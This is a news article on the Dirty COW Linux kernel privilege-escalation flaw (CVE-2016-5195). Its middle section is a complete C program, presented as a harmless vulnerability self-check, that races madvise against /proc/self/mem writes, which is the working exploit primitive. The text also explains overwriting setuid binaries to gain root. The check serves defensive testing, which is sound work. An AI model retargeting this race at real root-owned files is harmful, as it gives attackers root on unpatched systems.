Security researchers have disclosed a serious Linux kernel vulnerability, nicknamed ‘Dirty COW’, that has been in the kernel for nine years and is now under active exploitation. Researchers are advising virtually all Linux users to install the patched kernel as soon as their distribution ships it.
The vulnerability was first uncovered by security researcher Phil Oester, who told V3 that “the exploit in the wild is trivial to execute, never fails and has probably been around for years.” The exploit takes less than five seconds to gain write access to files that the attacker is only allowed to read, including files owned by root. If the vulnerability is not addressed right now, it will certainly become more widely used in the near future, says Oester.
He adds that the underlying bug has been present in the Linux kernel since 2007 (kernel 2.6.22 onwards), and that he stumbled on it while examining a server that had been compromised with an exploit for it. He had been capturing all inbound HTTP traffic to that server, which allowed him to extract the exploit and test it in a sandbox.
The vulnerability, CVE-2016-5195, is a local privilege escalation: an attacker who already has a foothold on the machine (an unprivileged shell, or a compromised web application) can use it to write to on-disk files that are normally read-only to them, such as root-owned setuid binaries, and so obtain root. And because any root-owned file can be overwritten this easily, an attacker can just as easily plant a backdoor and regain access to the system remotely whenever they wish.
The name ‘Dirty COW’ comes from the mechanism: the bug is in the handling of the dirty bit during copy-on-write (COW) of private, read-only memory mappings, which is what lets an unprivileged process write to pages it should only be able to read. Red Hat has rated the flaw ‘Important’ and has warned its users to apply the update right away. Its advisory describes the bug as follows:
A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write [COW] breakage of private read-only memory mappings.
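The race Red Hat describes can be reproduced as a harmless self-check. The C program below is an added example, not code from the article or from the captured exploit: it creates a file that the current user can only read, maps it PROT_READ/MAP_PRIVATE, and races madvise(MADV_DONTNEED) (which discards the private COW copy) against a write through /proc/self/mem at the mapping's address (the FOLL_FORCE path in get_user_pages() where the dirty-bit check was wrong). On a vulnerable kernel the write lands in the page cache and the file on disk changes; on a fixed kernel it only ever hits a throw-away copy. The default path /tmp/dirtycow_check.txt, the payload `m00000` and the round count are assumptions for illustration; the target file is owned by the caller, so nothing is escalated even where the race succeeds.

```c
/* dirtycow_check.c: added example, not from the article or the in-the-wild
 * exploit. Build with: cc -pthread -o dirtycow_check dirtycow_check.c */
#define _GNU_SOURCE
#define _FILE_OFFSET_BITS 64
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ROUNDS 100000  /* race iterations per thread (assumed value; tune as needed) */

struct race {
    void *map;            /* private PROT_READ mapping of the target file */
    size_t len;           /* length of that mapping */
    const char *payload;  /* bytes we try to force into the file */
    int mem_ok;           /* set once /proc/self/mem could be opened */
};

/* Thread 1: keep discarding the private COW copy so the writer has to fault
 * the page in again; that re-fault is the window the bug lives in. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (int i = 0; i < ROUNDS; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: write the payload at the mapping's address via /proc/self/mem,
 * i.e. through get_user_pages(FOLL_FORCE), not through the mapping itself. */
static void *write_thread(void *arg)
{
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0)
        return NULL;
    r->mem_ok = 1;
    size_t n = strlen(r->payload);
    for (int i = 0; i < ROUNDS; i++)
        (void)pwrite(fd, r->payload, n, (off_t)(uintptr_t)r->map);
    close(fd);
    return NULL;
}

/* Create a read-only file at `path` holding `original`, race to overwrite its
 * first bytes with `payload`, and return 1 if the file changed (kernel is
 * vulnerable), 0 if it is unchanged (kernel has the fix), -1 on setup error
 * (including /proc/self/mem being unavailable, which would be a false negative). */
int dirtycow_check(const char *path, const char *original, const char *payload)
{
    struct stat st;
    struct race r = { 0 };
    pthread_t t1, t2;
    char buf[256];
    ssize_t n;
    int fd;

    if (strlen(original) == 0 || strlen(payload) > strlen(original))
        return -1;

    /* Target is read-only to us, like a root-owned setuid binary would be. */
    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    n = write(fd, original, strlen(original));
    close(fd);
    if (n != (ssize_t)strlen(original) || chmod(path, 0444) < 0)
        return -1;

    /* Open O_RDONLY and map privately: the kernel should only ever hand us a
     * COW copy of these pages, never the page-cache page itself. */
    fd = open(path, O_RDONLY);
    if (fd < 0 || fstat(fd, &st) < 0)
        return -1;
    r.len = (size_t)st.st_size;
    r.payload = payload;
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED) {
        close(fd);
        return -1;
    }

    if (pthread_create(&t1, NULL, madvise_thread, &r) != 0) {
        munmap(r.map, r.len);
        close(fd);
        return -1;
    }
    if (pthread_create(&t2, NULL, write_thread, &r) == 0)
        pthread_join(t2, NULL);
    pthread_join(t1, NULL);
    munmap(r.map, r.len);
    close(fd);
    if (!r.mem_ok)
        return -1;

    /* Re-read from the file itself and see whether the payload landed. */
    fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;
    n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return strncmp(buf, payload, strlen(payload)) == 0 ? 1 : 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/tmp/dirtycow_check.txt";
    int rc = dirtycow_check(path, "this file is read-only and was opened O_RDONLY\n", "m00000");
    if (rc < 0) {
        perror("dirtycow_check");
        return 2;
    }
    printf("%s\n", rc ? "file changed through a read-only mapping: VULNERABLE to CVE-2016-5195"
                      : "file unchanged: this kernel has the fix");
    unlink(path);
    return rc;
}
```

Run it as an ordinary user; a result of 1 means the running kernel still has the bug regardless of what `uname -r` says, which matters because distributions backport the fix without changing the upstream version number. A result of 0 after a kernel update is only meaningful once the machine has actually booted into the new kernel.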
Linus Torvalds, the creator of the Linux kernel, himself called the flaw ancient. In the git commit that fixes it, he writes:
This is an ancient bug that was actually attempted to be fixed once (badly) by me eleven years ago in commit but that was then undone due to problems on s390. In the meantime, the s390 situation has long been fixed, and we can now fix it by checking the pte_dirty() bit properly.
The kernel maintainers patched the underlying bug this week, before public disclosure, and have handed the fix to downstream distributors so that they can release updated kernel packages incorporating it.
Because this is a race condition in core kernel code, it is present on every system and server running an unpatched Linux kernel, and all of them remain exposed until they are updated and rebooted into the fixed kernel. It is advised, yet again, to update as soon as the security update is made available by your distribution.
You can watch this video both to learn more about the exploit and to see a live proof of concept executed on a Linux system affected by the vulnerability.